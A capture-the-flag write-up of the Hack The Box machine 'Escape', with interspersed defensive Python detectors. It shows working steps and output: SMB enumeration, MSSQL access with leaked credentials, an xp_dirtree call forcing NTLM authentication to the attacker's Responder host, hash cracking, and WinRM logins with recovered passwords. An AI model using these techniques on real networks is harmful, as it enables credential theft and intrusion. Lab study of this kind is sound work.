
【Hack The Box】Escape【WriteUp】

Posted at 2023-06-18

Introduction

Hi, I'm a hopelessly mediocre wannabe engineer.
This article is my writeup of the Hack The Box (see the link below) machine "Escape".
Note: this post does not go into details such as how to use each tool (see my earlier posts for that), so please bear with me.

Note: do not misuse any of this. Use these techniques strictly to contribute to society; otherwise you will be breaking the law.

Discovery

Port scan

This time I tried a fast scan with RustScan.

┌──(root㉿kali)-[~]
└─# rustscan -a 10.10.11.202 --top --ulimit 5000 
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.202:53
Open 10.10.11.202:88
Open 10.10.11.202:135
Open 10.10.11.202:139
Open 10.10.11.202:389
Open 10.10.11.202:445
Open 10.10.11.202:464
Open 10.10.11.202:593
Open 10.10.11.202:636
Open 10.10.11.202:9389
Open 10.10.11.202:49667
Open 10.10.11.202:49687
Open 10.10.11.202:49688
Open 10.10.11.202:49708
Open 10.10.11.202:49712
Open 10.10.11.202:55479
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 07:53 EST
Initiating Ping Scan at 07:53
Scanning 10.10.11.202 [4 ports]
Completed Ping Scan at 07:53, 0.25s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:53
Completed Parallel DNS resolution of 1 host. at 07:53, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 07:53
Scanning 10.10.11.202 [16 ports]
Discovered open port 53/tcp on 10.10.11.202
Discovered open port 445/tcp on 10.10.11.202
Discovered open port 135/tcp on 10.10.11.202
Discovered open port 139/tcp on 10.10.11.202
Discovered open port 49688/tcp on 10.10.11.202
Discovered open port 593/tcp on 10.10.11.202
Discovered open port 49687/tcp on 10.10.11.202
Discovered open port 49667/tcp on 10.10.11.202
Discovered open port 49712/tcp on 10.10.11.202
Discovered open port 49708/tcp on 10.10.11.202
Discovered open port 389/tcp on 10.10.11.202
Discovered open port 464/tcp on 10.10.11.202
Discovered open port 88/tcp on 10.10.11.202
Discovered open port 55479/tcp on 10.10.11.202
Discovered open port 636/tcp on 10.10.11.202
Discovered open port 9389/tcp on 10.10.11.202
Completed SYN Stealth Scan at 07:53, 0.42s elapsed (16 total ports)
Nmap scan report for 10.10.11.202
Host is up, received echo-reply ttl 127 (0.20s latency).
Scanned at 2023-03-08 07:53:04 EST for 0s

PORT      STATE SERVICE        REASON
53/tcp    open  domain         syn-ack ttl 127
88/tcp    open  kerberos-sec   syn-ack ttl 127
135/tcp   open  msrpc          syn-ack ttl 127
139/tcp   open  netbios-ssn    syn-ack ttl 127
389/tcp   open  ldap           syn-ack ttl 127
445/tcp   open  microsoft-ds   syn-ack ttl 127
464/tcp   open  kpasswd5       syn-ack ttl 127
593/tcp   open  http-rpc-epmap syn-ack ttl 127
636/tcp   open  ldapssl        syn-ack ttl 127
9389/tcp  open  adws           syn-ack ttl 127
49667/tcp open  unknown        syn-ack ttl 127
49687/tcp open  unknown        syn-ack ttl 127
49688/tcp open  unknown        syn-ack ttl 127
49708/tcp open  unknown        syn-ack ttl 127
49712/tcp open  unknown        syn-ack ttl 127
55479/tcp open  unknown        syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.78 seconds
           Raw packets sent: 20 (856B) | Rcvd: 17 (732B)

Looks like a Windows environment. Plenty of ports are open, so I'll start gathering information.

I also run the LDAP script to quickly pull information about the AD environment.

┌──(root㉿kali)-[~]
└─# nmap -p 389 -n -Pn --open 10.10.11.202 --script ldap-rootdse
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 07:53 EST
Nmap scan report for 10.10.11.202
Host is up (0.18s latency).

PORT    STATE SERVICE
389/tcp open  ldap
| ldap-rootdse: 
| LDAP Results
|   <ROOT>
|       domainFunctionality: 7
|       forestFunctionality: 7
|       domainControllerFunctionality: 7
|       rootDomainNamingContext: DC=sequel,DC=htb
|       ldapServiceName: sequel.htb:dc$@SEQUEL.HTB
|       isGlobalCatalogReady: TRUE
|       supportedSASLMechanisms: GSSAPI
|       supportedSASLMechanisms: GSS-SPNEGO
|       supportedSASLMechanisms: EXTERNAL
|       supportedSASLMechanisms: DIGEST-MD5
|       supportedLDAPVersion: 3
|       supportedLDAPVersion: 2
|       supportedLDAPPolicies: MaxPoolThreads
|       supportedLDAPPolicies: MaxPercentDirSyncRequests
|       supportedLDAPPolicies: MaxDatagramRecv
|       supportedLDAPPolicies: MaxReceiveBuffer
|       supportedLDAPPolicies: InitRecvTimeout
|       supportedLDAPPolicies: MaxConnections
|       supportedLDAPPolicies: MaxConnIdleTime
|       supportedLDAPPolicies: MaxPageSize
|       supportedLDAPPolicies: MaxBatchReturnMessages
|       supportedLDAPPolicies: MaxQueryDuration
|       supportedLDAPPolicies: MaxDirSyncDuration
|       supportedLDAPPolicies: MaxTempTableSize
|       supportedLDAPPolicies: MaxResultSetSize
|       supportedLDAPPolicies: MinResultSets
|       supportedLDAPPolicies: MaxResultSetsPerConn
|       supportedLDAPPolicies: MaxNotificationPerConn
|       supportedLDAPPolicies: MaxValRange
|       supportedLDAPPolicies: MaxValRangeTransitive
|       supportedLDAPPolicies: ThreadMemoryLimit
|       supportedLDAPPolicies: SystemMemoryLimitPercent
|       supportedControl: 1.2.840.113556.1.4.319
|       supportedControl: 1.2.840.113556.1.4.801
|       supportedControl: 1.2.840.113556.1.4.473
|       supportedControl: 1.2.840.113556.1.4.528
|       supportedControl: 1.2.840.113556.1.4.417
|       supportedControl: 1.2.840.113556.1.4.619
|       supportedControl: 1.2.840.113556.1.4.841
|       supportedControl: 1.2.840.113556.1.4.529
|       supportedControl: 1.2.840.113556.1.4.805
|       supportedControl: 1.2.840.113556.1.4.521
|       supportedControl: 1.2.840.113556.1.4.970
|       supportedControl: 1.2.840.113556.1.4.1338
|       supportedControl: 1.2.840.113556.1.4.474
|       supportedControl: 1.2.840.113556.1.4.1339
|       supportedControl: 1.2.840.113556.1.4.1340
|       supportedControl: 1.2.840.113556.1.4.1413
|       supportedControl: 2.16.840.1.113730.3.4.9
|       supportedControl: 2.16.840.1.113730.3.4.10
|       supportedControl: 1.2.840.113556.1.4.1504
|       supportedControl: 1.2.840.113556.1.4.1852
|       supportedControl: 1.2.840.113556.1.4.802
|       supportedControl: 1.2.840.113556.1.4.1907
|       supportedControl: 1.2.840.113556.1.4.1948
|       supportedControl: 1.2.840.113556.1.4.1974
|       supportedControl: 1.2.840.113556.1.4.1341
|       supportedControl: 1.2.840.113556.1.4.2026
|       supportedControl: 1.2.840.113556.1.4.2064
|       supportedControl: 1.2.840.113556.1.4.2065
|       supportedControl: 1.2.840.113556.1.4.2066
|       supportedControl: 1.2.840.113556.1.4.2090
|       supportedControl: 1.2.840.113556.1.4.2205
|       supportedControl: 1.2.840.113556.1.4.2204
|       supportedControl: 1.2.840.113556.1.4.2206
|       supportedControl: 1.2.840.113556.1.4.2211
|       supportedControl: 1.2.840.113556.1.4.2239
|       supportedControl: 1.2.840.113556.1.4.2255
|       supportedControl: 1.2.840.113556.1.4.2256
|       supportedControl: 1.2.840.113556.1.4.2309
|       supportedControl: 1.2.840.113556.1.4.2330
|       supportedControl: 1.2.840.113556.1.4.2354
|       supportedCapabilities: 1.2.840.113556.1.4.800
|       supportedCapabilities: 1.2.840.113556.1.4.1670
|       supportedCapabilities: 1.2.840.113556.1.4.1791
|       supportedCapabilities: 1.2.840.113556.1.4.1935
|       supportedCapabilities: 1.2.840.113556.1.4.2080
|       supportedCapabilities: 1.2.840.113556.1.4.2237
|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=sequel,DC=htb
|       serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=sequel,DC=htb
|       schemaNamingContext: CN=Schema,CN=Configuration,DC=sequel,DC=htb
|       namingContexts: DC=sequel,DC=htb
|       namingContexts: CN=Configuration,DC=sequel,DC=htb
|       namingContexts: CN=Schema,CN=Configuration,DC=sequel,DC=htb
|       namingContexts: DC=DomainDnsZones,DC=sequel,DC=htb
|       namingContexts: DC=ForestDnsZones,DC=sequel,DC=htb
|       isSynchronized: TRUE
|       highestCommittedUSN: 159905
|       dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=sequel,DC=htb
|       dnsHostName: dc.sequel.htb
|       defaultNamingContext: DC=sequel,DC=htb
|       currentTime: 20230308205315.0Z
|_      configurationNamingContext: CN=Configuration,DC=sequel,DC=htb
Service Info: Host: DC; OS: Windows

Nmap done: 1 IP address (1 host up) scanned in 1.16 seconds

The dnsHostName: dc.sequel.htb entry gives away the domain (sequel.htb) and the hostname of the domain controller.

Collection

rpcclient

RPC is open, so I check whether anonymous enumeration works.

┌──(root㉿kali)-[~/work]
└─# rpcclient 10.10.11.202 -U '' -N             
rpcclient $> enumdomains
result was NT_STATUS_ACCESS_DENIED
rpcclient $> 

No luck.

SMB

Ports 139 and 445 are open, so I check whether I can talk SMB.
There may be a file on a share that gives a hint.
I look for shares that can be read without a password.

┌──(root㉿kali)-[~/work]
└─# smbclient --no-pass -L 10.10.11.202         

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Public          Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Public is obviously the suspicious one, so I dig into that share.

┌──(root㉿kali)-[~/work]
└─# smbclient -N \\\\10.10.11.202\\Public  
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Nov 19 06:51:25 2022
  ..                                  D        0  Sat Nov 19 06:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 08:39:43 2022

                5184255 blocks of size 4096. 1466750 blocks available

SQL Server Procedures.pdf looks interesting, so I grab it right away. There was only one file this time, but for practice I type out the commands that pull down an entire folder tree in one go (Windows environments are rare, after all...).

smb: \> 
smb: \> 
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (51.7 KiloBytes/sec) (average 51.7 KiloBytes/sec)
smb: \> exit

The PDF looked like this.
[Image: スクリーンショット 2023-03-19 201137.png]
It revealed the credentials PublicUser : GuestUserCantWrite1 and the fact that MSSQL is in use.

Credential Access

MSSQL

For the MSSQL attack procedure, see the references here.

impacket has a handy tool for connecting to MSSQL, so I use that.

┌──(root㉿kali)-[~/work]
└─# impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@10.10.11.202
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL> 
SQL> help

     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd
     
SQL> 
SQL> select @@version;
                                                                                                                                                                                                                                                                  

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   

Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) 
        Sep 24 2019 13:48:23 
        Copyright (C) 2019 Microsoft Corporation
        Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
                                          

SQL> 
SQL> select user_name();
                                                                                                                                   

--------------------------------------------------------------------------------------------------------------------------------   

guest                                                                                                                              

SQL> 
SQL> enable_xp_cmdshell
[-] ERROR(DC\SQLMOCK): Line 105: User does not have permission to perform this action.
[-] ERROR(DC\SQLMOCK): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(DC\SQLMOCK): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(DC\SQLMOCK): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL> SELECT name FROM master.dbo.sysdatabases;
name                                                                                                                               

--------------------------------------------------------------------------------------------------------------------------------   

master                                                                                                                             

tempdb                                                                                                                             

model                                                                                                                              

msdb                                                                                                                               

SQL> 
SQL> 
SQL> SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
SQL> 
SQL> 

Command execution via xp_cmdshell does not look possible. Well, this is guest, so that was expected.
The next thing to try is harvesting an NTLM hash: I'll make the server reach out with the xp_dirtree command.
But before that, start Responder.

┌──(root㉿kali)-[~/work]
└─# responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.139]
    Responder IPv6             [dead:beef:2::1089]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-O67RVFYV0RX]
    Responder Domain Name      [F0BS.LOCAL]
    Responder DCE-RPC Port     [47851]

[+] Listening for events...

Now let's see whether I can capture an NTLM hash.
[Image: 1.png]
I captured the NTLM hash of sql_svc.
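As an added example (not from the original writeup), this is how a defender can spot the xp_dirtree trick described above in SQL Server Audit / Extended Events data: any statement that hands the engine a UNC path to a host that is not an approved file server forces the service account (sql_svc here) to authenticate to that host. The audit rows, the field names server_principal/database_principal/client/statement, and the approved-host list are all assumptions made for the example.

```python
"""Flag T-SQL that makes SQL Server open a UNC path as its service account.

Added example, not part of the original writeup.  xp_dirtree and friends
resolve their path argument as the SQL Server service account (sql_svc on
this box), so a UNC path naming an attacker-controlled host leaks that
account's NetNTLMv2 response.  The audit rows below are constructed, and
the field names (server_principal, database_principal, client, statement)
are an assumption about how SQL Server Audit / Extended Events data is exported.
"""
import re
from dataclasses import dataclass
from typing import Dict, FrozenSet, Iterable, List, Optional

# Extended stored procedures whose path argument the engine will touch.
PATH_XPS = ("xp_dirtree", "xp_fileexist", "xp_subdirs", "xp_getfiledetails")
XP_RE = re.compile(r"\b(?:" + "|".join(PATH_XPS) + r")\b", re.IGNORECASE)
# BACKUP ... TO DISK = '\\host\share\x.bak' opens the path the same way.
BACKUP_RE = re.compile(r"\bBACKUP\s+(?:DATABASE|LOG)\b.*?\bTO\s+DISK\s*=",
                       re.IGNORECASE | re.DOTALL)
# \\host\share where host is a name or an IPv4 literal.
UNC_RE = re.compile(r"\\\\(?P<host>[A-Za-z0-9_.\-]+)\\(?P<share>[^\\'\";,\s)]+)")
IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


@dataclass(frozen=True)
class Finding:
    principal: str
    client: str
    host: str
    reason: str
    statement: str


def classify_host(host: str, domain: str, approved: FrozenSet[str]) -> Optional[str]:
    """Explain why a UNC host is suspicious, or return None for an approved file server."""
    h = host.lower()
    if h in approved:
        return None
    if IPV4_RE.fullmatch(h):
        return "UNC target is a bare IP address"
    if not h.endswith("." + domain.lower()):
        return "UNC target is outside the domain"
    return "UNC target is a domain host but not an approved file server"


def analyse(events: Iterable[Dict[str, str]], domain: str,
            approved_hosts: Iterable[str]) -> List[Finding]:
    """Return one Finding per suspicious UNC path found in a path-opening statement."""
    approved = frozenset(h.lower() for h in approved_hosts)
    findings: List[Finding] = []
    for ev in events:
        stmt = ev["statement"]
        if not (XP_RE.search(stmt) or BACKUP_RE.search(stmt)):
            continue  # this statement cannot make the engine open a path
        for m in UNC_RE.finditer(stmt):
            reason = classify_host(m.group("host"), domain, approved)
            if reason is None:
                continue
            if ev.get("database_principal", "").lower() == "guest":
                reason += " (issued through the guest database user)"
            findings.append(Finding(ev["server_principal"], ev["client"],
                                    m.group("host"), reason, stmt))
    return findings


# Constructed sample audit rows; 10.10.14.139 is the attacker box from the writeup.
SAMPLE_EVENTS = [
    {"server_principal": "PublicUser", "database_principal": "guest", "client": "10.10.14.139",
     "statement": r"EXEC master..xp_dirtree '\\10.10.14.139\share', 1, 1"},
    {"server_principal": "SEQUEL\\backupsvc", "database_principal": "dbo", "client": "10.10.11.202",
     "statement": r"BACKUP DATABASE master TO DISK = '\\backup01.sequel.htb\sqlbackups\master.bak'"},
    {"server_principal": "SEQUEL\\Ryan.Cooper", "database_principal": "dbo", "client": "10.10.11.50",
     "statement": r"EXEC xp_fileexist 'C:\SQLServer\Logs\ERRORLOG.BAK'"},
    {"server_principal": "SEQUEL\\Ryan.Cooper", "database_principal": "dbo", "client": "10.10.11.50",
     "statement": r"EXEC master..xp_subdirs '\\ws01.sequel.htb\c$'"},
    {"server_principal": "PublicUser", "database_principal": "guest", "client": "10.10.14.139",
     "statement": "SELECT name FROM master.dbo.sysdatabases;"},
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS, "sequel.htb", ["backup01.sequel.htb"]):
        print(f"{f.principal}@{f.client} -> \\\\{f.host}: {f.reason}")
```

Blocking outbound SMB (445) from the SQL host and running the instance under a gMSA removes most of the value of the captured response; the detection above tells you when to go looking.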

Let's try to crack this hash.

Cracking the hash

As always, I'm counting on you, John.
First, create the hash file.
[Image: 2.png]
Then run John.
[Image: 3.png]
Oh, it's a type that can be cracked. It seems I don't need to do pass-the-hash, so I use this password to log in with evil-winrm.
[Image: 4.png]
I'm in, so it worked. However, this user cannot read the user flag, so horizontal (lateral) privilege escalation looks necessary.

Privilege Escalation - Horizontal

While exploring the directory tree as shown below, I found an interesting-looking log.

*Evil-WinRM* PS C:\Users> cd ../
*Evil-WinRM* PS C:\> dir


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/1/2023   8:15 PM                PerfLogs
d-r---         2/6/2023  12:08 PM                Program Files
d-----       11/19/2022   3:51 AM                Program Files (x86)
d-----       11/19/2022   3:51 AM                Public
d-----         2/1/2023   1:02 PM                SQLServer
d-r---         2/1/2023   1:55 PM                Users
d-----         2/6/2023   7:21 AM                Windows


*Evil-WinRM* PS C:\> 




*Evil-WinRM* PS C:\SQLServer> dir


    Directory: C:\SQLServer


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/7/2023   8:06 AM                Logs
d-----       11/18/2022   1:37 PM                SQLEXPR_2019
-a----       11/18/2022   1:35 PM        6379936 sqlexpress.exe
-a----       11/18/2022   1:36 PM      268090448 SQLEXPR_x64_ENU.exe


*Evil-WinRM* PS C:\SQLServer> cd Logs
*Evil-WinRM* PS C:\SQLServer\Logs> dir


    Directory: C:\SQLServer\Logs


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         2/7/2023   8:06 AM          27608 ERRORLOG.BAK

Download this log file.

*Evil-WinRM* PS C:\SQLServer\Logs> download ERRORLOG.BAK ERRORLOG.BAK
Info: Downloading ERRORLOG.BAK to ERRORLOG.BAK

                                                             
Info: Download successful!

*Evil-WinRM* PS C:\SQLServer\Logs>

Let's check its contents.
[Image: 7.png]
Ah, I can see a string that looks like a password typed in by mistake, so let's try it.
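Added example, not from the original writeup: a scanner for the pattern seen in ERRORLOG.BAK, a failed logon for a real account followed within seconds, from the same client, by a failed logon whose "user name" is really a password. The log lines and client addresses are constructed, and the heuristic for what counts as a plausible account name is an assumption.

```python
"""Find passwords typed into the user-name field in a SQL Server ERRORLOG.

Added example, not part of the original writeup.  When someone puts the
password in the user-name box, the engine writes it verbatim into a
"Logon failed for user '...'" line, usually right after a failure for the
real account from the same client.  The log below is constructed to mirror
that pattern; client addresses and timestamps are invented.
"""
import re
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# One ERRORLOG line: "<timestamp> Logon   Logon failed for user '<name>'. Reason: ... [CLIENT: <ip>]"
LOGON_FAIL_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) Logon\s+"
    r"Logon failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)
# Heuristic (assumption): real principals look like DOMAIN\name, name@realm or a
# short letters/dots name.  Anything with digits or symbols and no realm is suspect.
ACCOUNT_RE = re.compile(r"^(?:[A-Za-z0-9.\-]+\\)?[A-Za-z][A-Za-z.\-_]{0,30}(?:@[A-Za-z0-9.\-]+)?$")


def parse_failed_logons(lines) -> List[Tuple[datetime, str, str]]:
    """Extract (timestamp, user, client) from every failed-logon line."""
    out = []
    for line in lines:
        m = LOGON_FAIL_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S.%f")
            out.append((ts, m.group("user"), m.group("client")))
    return out


def looks_like_account(name: str) -> bool:
    return ACCOUNT_RE.match(name) is not None


def mask(secret: str) -> str:
    # Never write the suspected secret back out in full; the account is what matters.
    return secret[:2] + "***"


def scan_errorlog(lines, window: timedelta = timedelta(seconds=60)) -> List[Dict[str, str]]:
    """Pair each implausible 'user name' with the preceding real-account failure from the same client."""
    events = parse_failed_logons(lines)
    findings = []
    for i, (ts, user, client) in enumerate(events):
        if looks_like_account(user):
            continue  # a plausible principal, nothing leaked
        for prev_ts, prev_user, prev_client in reversed(events[:i]):
            if ts - prev_ts > window:
                break
            if prev_client == client and looks_like_account(prev_user):
                findings.append({"account": prev_user, "secret_masked": mask(user),
                                 "client": client, "at": ts.isoformat(sep=" ")})
                break
    return findings


# Constructed ERRORLOG excerpt modelled on the pattern the writeup found.
SAMPLE_ERRORLOG = r"""
2022-11-18 13:43:05.12 Logon       Error: 18456, Severity: 14, State: 5.
2022-11-18 13:43:05.12 Logon       Logon failed for user 'sa'. Reason: Could not find a login matching the name provided. [CLIENT: 10.10.11.77]
2022-11-18 13:43:07.44 Logon       Error: 18456, Severity: 14, State: 5.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Could not find a login matching the name provided. [CLIENT: 10.10.11.23]
2022-11-18 13:43:09.98 Logon       Error: 18456, Severity: 14, State: 5.
2022-11-18 13:43:09.98 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Could not find a login matching the name provided. [CLIENT: 10.10.11.23]
2022-11-18 13:43:12.01 Logon       Login succeeded for user 'sequel\Ryan.Cooper'. Connection made using Windows authentication. [CLIENT: 10.10.11.23]
"""

if __name__ == "__main__":
    for f in scan_errorlog(SAMPLE_ERRORLOG.splitlines()):
        print(f"{f['at']} rotate {f['account']} (leaked as {f['secret_masked']} from {f['client']})")
```

Each hit means the account's password sits in plain text in a world-readable log (and its .BAK copies), so the fix is to rotate the password and purge the log, not just to tighten ACLs on the file.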

┌──(root㉿kali)-[~/work]
└─# evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p NuclearMosquito3

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> 
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> whoami
sequel\ryan.cooper
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> 

It worked!!!
With that, horizontal privilege escalation succeeded and I got the user flag.

Privilege Escalation - Vertical

Information gathering

RustHound

I use RustHound instead of BloodHound. If you have built it with Docker beforehand there is no need to push an exe to the target by hand; you get the zip file quickly, which is convenient.

To build it, run the following command.
Note: this takes a little while.

┌──(root㉿kali)-[/opt/RustHound]
└─# docker build -t rusthound .
[+] Building 296.4s (11/11) FINISHED                                                                                                                        
 => [internal] load build definition from Dockerfile                                                                                                   0.1s
 => => transferring dockerfile: 368B                                                                                                                   0.0s
 => [internal] load .dockerignore                                                                                                                      0.1s
 => => transferring context: 2B                                                                                                                        0.0s
 => [internal] load metadata for docker.io/library/rust:1.64-slim-buster                                                                               2.9s
 => [1/6] FROM docker.io/library/rust:1.64-slim-buster@sha256:da66962a6c5b9cae84a6e3e9ea67da5507b91ec0b4604016e07f5077286b1b2e                        18.7s
 => => resolve docker.io/library/rust:1.64-slim-buster@sha256:da66962a6c5b9cae84a6e3e9ea67da5507b91ec0b4604016e07f5077286b1b2e                         0.0s
 => => sha256:e8da65b7aee6fe31a02a9b12e846ecb549032a0e21d23307414d1748fef914d0 194.36MB / 194.36MB                                                     7.7s
 => => sha256:da66962a6c5b9cae84a6e3e9ea67da5507b91ec0b4604016e07f5077286b1b2e 984B / 984B                                                             0.0s
 => => sha256:c761809aae5fe07769dab99f4404ca5d71a954934a74484e48eb06c0260ef484 742B / 742B                                                             0.0s
 => => sha256:085572de3c6eef7d59c5fe4feb8263dffa0425acb73747606391b2a8afec2446 4.85kB / 4.85kB                                                         0.0s
 => => sha256:4500a762c54620411ae491a547c66b61d577c1369ecbf5a7e91b4e153181854b 27.14MB / 27.14MB                                                       1.3s
 => => extracting sha256:4500a762c54620411ae491a547c66b61d577c1369ecbf5a7e91b4e153181854b                                                              3.2s
 => => extracting sha256:e8da65b7aee6fe31a02a9b12e846ecb549032a0e21d23307414d1748fef914d0                                                             10.7s
 => [internal] load build context                                                                                                                      0.1s
 => => transferring context: 532.71kB                                                                                                                  0.0s
 => [2/6] WORKDIR /usr/src/rusthound                                                                                                                   1.6s
 => [3/6] RUN apt-get -y update && apt-get -y install gcc libclang-dev clang libclang-dev libgssapi-krb5-2 libkrb5-dev libsasl2-modules-gssapi-mit m  28.6s
 => [4/6] COPY ./src/ ./src/                                                                                                                           0.1s
 => [5/6] COPY ./Cargo.toml ./Cargo.toml                                                                                                               0.1s 
 => [6/6] RUN cargo install --path .                                                                                                                 237.5s 
 => exporting to image                                                                                                                                 6.9s 
 => => exporting layers                                                                                                                                6.9s 
 => => writing image sha256:490ee8c18b28affff12ed0cb78992e21209368efd68a64772b027f2bf31f8bc8                                                           0.0s 
 => => naming to docker.io/library/rusthound  

Once the build is done, run RustHound in Docker.

┌──(root㉿kali)-[/opt/RustHound]
└─# docker run -v /opt/RustHound/work:/tmp/htb rusthound -d sequel.htb -i 10.10.11.202 -u 'Ryan.Cooper@sequel.htb' -p 'NuclearMosquito3' -o '/tmp/htb' -z --ldaps
---------------------------------------------------
[2023-03-10T13:50:55Z INFO  rusthound] Verbosity level: Info
Initializing RustHound at 13:50:55 on 03/10/23
Powered by g0h4n from OpenCyber
---------------------------------------------------

[2023-03-10T13:50:56Z INFO  rusthound::ldap] Connected to SEQUEL.HTB Active Directory!
[2023-03-10T13:50:56Z INFO  rusthound::ldap] Starting data collection...
[2023-03-10T13:50:57Z INFO  rusthound::ldap] All data collected for NamingContext DC=sequel,DC=htb
[2023-03-10T13:50:57Z INFO  rusthound::json::parser] Starting the LDAP objects parsing...
[2023-03-10T13:50:57Z INFO  rusthound::json::parser::bh_41] ADCS found DC=htb,DC=sequel,CN=sequel-DC-CA, use --adcs args to collect the certificate templates and certificate authority.
[2023-03-10T13:50:57Z INFO  rusthound::json::parser::bh_41] ADCS found DC=htb,DC=sequel,CN=sequel-DC-CA, use --adcs args to collect the certificate templates and certificate authority.
[2023-03-10T13:50:57Z INFO  rusthound::json::parser] Parsing LDAP objects finished!
[2023-03-10T13:50:57Z INFO  rusthound::json::checker] Starting checker to replace some values...
[2023-03-10T13:50:57Z INFO  rusthound::json::checker] Checking and replacing some values finished!
